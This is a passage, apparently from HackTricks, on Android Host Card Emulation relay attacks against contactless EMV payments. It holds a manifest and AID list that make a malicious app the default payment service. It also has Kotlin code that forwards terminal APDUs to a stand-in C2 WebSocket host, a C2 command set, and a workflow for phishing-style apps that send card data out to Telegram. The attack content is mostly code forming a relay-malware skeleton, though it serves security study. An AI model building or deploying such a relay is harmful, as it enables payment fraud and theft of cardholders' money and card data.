Android HCE NFC/EMV Relay Attacks

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

개요

Android Host Card Emulation (HCE)의 악용은 기본 NFC 결제 서비스로 설정된 악성 앱이 EMV 비접촉식 거래를 실시간으로 중계할 수 있게 합니다. POS 단말기는 전화기와 ISO 14443-4/EMV로 통신하고; 앱의 HostApduService는 APDUs를 수신하여 양방향 C2(종종 WebSocket)를 통해 응답을 생성하는 백엔드로 전달하며, 그 응답이 다시 POS로 중계됩니다. 이는 로컬 카드 데이터 없이 실시간 카드 에뮬레이션을 가능하게 합니다. 대규모로 관찰된 캠페인들은 은행/정부 앱으로 가장하여 기본 결제 앱이 되도록 요청하고, 기기/카드 데이터를 Telegram 봇/채널로 자동 탈취합니다.

주요 특징

  • Android 구성요소: HostApduService + 기본 NFC 결제 핸들러(카테고리 “payment”)
  • 전송/C2: APDU 중계를 위한 WebSocket; 탈취/운영을 위한 Telegram bot API
  • 운영자 워크플로우: 구조화된 명령들 (login, register_device, apdu_command/apdu_response, get_pin/pin_response, paired, check_status, update_required, telegram_notification, error)
  • 역할: scanner (EMV 데이터 읽기) vs tapper (HCE/relay) 빌드

최소 구현 구성 요소

Manifest (기본 결제 HCE 서비스가 되기)

<uses-feature android:name="android.hardware.nfc.hce" android:required="true"/>
<uses-permission android:name="android.permission.NFC"/>

<application ...>
<service
android:name=".EmvRelayService"
android:exported="true"
android:permission="android.permission.BIND_NFC_SERVICE">
<intent-filter>
<action android:name="android.nfc.cardemulation.action.HOST_APDU_SERVICE"/>
</intent-filter>
<meta-data
android:name="android.nfc.cardemulation.host_apdu_service"
android:resource="@xml/aid_list"/>
</service>
</application>

EMV 결제 카테고리의 예제 AID 목록 (기본 결제로 설정된 앱만 이러한 AID에 응답할 수 있음):

<?xml version="1.0" encoding="utf-8"?>
<host-apdu-service xmlns:android="http://schemas.android.com/apk/res/android"
android:description="@string/app_name"
android:requireDeviceUnlock="false">
<aid-group android:category="payment" android:description="@string/app_name">
<!-- PPSE (2PAY.SYS.DDF01) routing -->
<aid-filter android:name="325041592E5359532E4444463031"/>
<!-- Common EMV AIDs (examples): -->
<aid-filter android:name="A0000000031010"/> <!-- VISA credit/debit -->
<aid-filter android:name="A0000000041010"/> <!-- MasterCard -->
<aid-filter android:name="A00000002501"/>   <!-- AmEx -->
</aid-group>
</host-apdu-service>

사용자에게 기본 결제 앱을 설정하도록 요청 (OS 설정을 엽니다):

val intent = Intent("android.settings.NFC_PAYMENT_SETTINGS")
startActivity(intent)

HostApduService 릴레이 스켈레톤

class EmvRelayService : HostApduService() {
private var ws: okhttp3.WebSocket? = null

override fun onCreate() {
super.onCreate()
// Establish C2 WebSocket early; authenticate and register device
val client = okhttp3.OkHttpClient()
val req = okhttp3.Request.Builder().url("wss://c2.example/ws").build()
ws = client.newWebSocket(req, object : okhttp3.WebSocketListener() {})
}

override fun processCommandApdu(commandApdu: ByteArray?, extras: Bundle?): ByteArray {
// Marshal APDU to C2 and block until response
val id = System.nanoTime()
val msg = mapOf(
"type" to "apdu_command",
"id" to id,
"data" to commandApdu!!.toHex()
)
val response = sendAndAwait(msg) // wait for matching apdu_response{id}
return response.hexToBytes()
}

override fun onDeactivated(reason: Int) {
ws?.send("{\"type\":\"card_removed\"}")
}

private fun sendAndAwait(m: Any): String {
// Implement correlation + timeout; handle error/blocked status
// ...
return "9000" // fall back to SW success if needed
}
}

유의사항: 백그라운드 서비스는 POS 타임아웃 예산(약 수백 ms) 내에 APDU별로 응답해야 합니다; 저지연 socket을 유지하고 C2와 pre-auth를 유지하세요. 필요하면 포그라운드 서비스를 사용해 프로세스 종료 이후에도 지속시키세요.

일반적인 C2 명령 집합 (관찰됨)

login / login_response
register / register_device / register_response
logout
apdu_command / apdu_response
card_info / clear_card_info / card_removed
get_pin / pin_response
check_status / status_response
paired / unpaired
update_required
telegram_notification / telegram_response
error

EMV 비접촉 교환 (입문)

The POS drives the flow; the HCE app simply relays APDUs:

  • SELECT PPSE (2PAY.SYS.DDF01)
  • 00 A4 04 00 0E 32 50 41 59 2E 53 59 53 2E 44 44 46 30 31 00
  • SELECT application AID (e.g., VISA A0000000031010)
  • 00 A4 04 00 len 00
  • GET PROCESSING OPTIONS (GPO)
  • 80 A8 00 00 Lc 00
  • READ RECORD(S) per AFL
  • 00 B2 <SFI/record> 0C 00
  • GENERATE AC (ARQC/TC)
  • 80 AE 80 00 Lc 00

In a relay, the backend crafts valid FCI/FCP, AFL, records and a cryptogram; the phone only forwards bytes.

실전에서 관찰된 운영자 워크플로우

  • Deception + install: app re-skins as bank/gov portal, presents full-screen WebView and immediately requests to become default NFC payment app.
  • Event-triggered activation: NFC tap wakes HostApduService; the relay begins.
  • Scanner/Tapper roles: one build reads EMV data from a victim card (PAN, exp, tracks, device/EMV fields) and exfiltrates; another build (or the same device later) performs HCE relay to a POS.
  • Exfiltration: device/card data is auto-posted to private Telegram channels/bots; WebSocket coordinates sessions and UI prompts (e.g., on-device PIN UI).

References

Tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기